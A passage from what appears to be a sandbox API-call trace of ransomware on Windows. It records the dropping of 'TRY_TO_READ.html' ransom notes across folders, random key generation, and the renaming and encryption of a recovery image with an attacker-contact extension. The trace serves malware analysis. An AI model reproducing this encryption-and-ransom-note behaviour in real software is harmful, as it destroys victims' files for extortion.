RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0116.713] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.713] GetLastError () returned 0x0 [0116.713] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.713] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0116.713] GetLastError () returned 0x0 [0116.713] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.713] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.715] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.715] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.716] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.716] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.716] CloseHandle (hObject=0x458) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0116.717] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.717] GetLastError () returned 0x0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.717] GetLastError () returned 0x0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329348 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.717] GetLastError () returned 0x0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.717] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0116.717] GetLastError () returned 0x0 [0116.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.718] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.720] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.722] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.723] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.723] CloseHandle (hObject=0x458) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0116.723] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.723] GetLastError () returned 0x0 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.723] GetLastError () returned 0x0 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.723] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329348 [0116.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3293d0 [0116.724] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.724] GetLastError () returned 0x0 [0116.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.724] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0116.724] GetLastError () returned 0x0 [0116.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.724] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.726] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.726] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.727] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.727] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.727] CloseHandle (hObject=0x458) returned 1 [0116.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0116.728] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df40 | out: hHeap=0x2e0000) returned 1 [0116.728] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\Admin\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dcd8 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.728] GetLastError () returned 0x12 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dd18 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dd18 | out: hHeap=0x2e0000) returned 1 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.728] FindNextFileW (in: hFindFile=0x35dcd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.728] GetLastError () returned 0x12 [0116.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dcd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970a00b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dcd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970a00b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.729] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dd18 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dd18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dd18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dd18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x970a00b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dd18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0116.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x35dd18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0116.729] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363318 | out: pbBuffer=0x363318) returned 1 [0116.729] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c38 | out: pbBuffer=0x330c38) returned 1 [0116.729] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x80) returned 1 [0116.732] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 59 [0116.732] GetProcessHeap () returned 0x2e0000 [0116.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x383d58 [0116.732] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0116.732] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR" [0116.732] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.736] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0116.736] GetProcessHeap () returned 0x2e0000 [0116.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0116.736] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=169213970) returned 1 [0116.736] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa160012 [0116.736] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.736] GetProcessHeap () returned 0x2e0000 [0116.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363420 [0116.737] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363420*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363420*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.737] WriteFile (in: hFile=0x460, lpBuffer=0x363420*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363420*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.740] WriteFile (in: hFile=0x460, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.740] WriteFile (in: hFile=0x460, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.740] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x30d0020 [0116.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x31e0020 [0116.741] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.741] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, 